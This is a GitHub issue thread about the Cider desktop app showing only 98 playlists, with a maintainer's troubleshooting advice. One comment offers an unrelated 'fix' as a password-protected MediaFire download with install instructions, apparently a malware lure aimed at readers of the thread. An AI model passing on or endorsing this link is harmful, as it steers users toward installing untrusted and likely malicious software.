### ISSUE TITLE
Playlist Limit

### ISSUE THREAD

**Issue by MuriloNovel** [ciderapp/Cider-2#757]
### Preflight Checklist

- [X] I agree to follow the [Code of Conduct](https://cider.sh/legal/conduct) that this project adheres to.
- [X] I have searched the [issue tracker](https://github.com/ciderapp/Cider-2/issues) for a bug report that matches the one I want to file, without success.
- [X] I have checked that the correct behavior occurs on [Apple Music Web](https://music.apple.com) (if applicable).
- [X] I have verified that my issue is with a [supported version](https://github.com/ciderapp/Cider-2/blob/main/SECURITY.md) and that it is with the desktop app (Support for other areas can be found in our Discord / on the appropriate repo).

### Download Source

Itch

### Operating System

Windows 

### Commit Hash

70fad40dcd8e1b6d6cc0e8979fdf5f52626f5f37

### Connect Instance ID

not-logged-in

### Build Timestamp

24/08/2024, 14:41:40

### Describe the Bug

Cider doesn't show all my playlists i have 15 more, it only shows 98

### Steps to Reproduce

well

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by coredev-uk** [comment]
It wont show all your playlists in the sidebar. All the fetchable playlists can be found in the 'All Playlists' tab. If a playlist is missing, please first check if they are present on the Apple Music website then come back to confirm this.

**Comment by MuriloNovel** [comment]
cider isn't showing all playlists even on the all playlists tab, that's why i did this report. and in apple web it's normal.

**Comment by coredev-uk** [comment]
Try enabling legacy playlist retrieval in settings > advanced
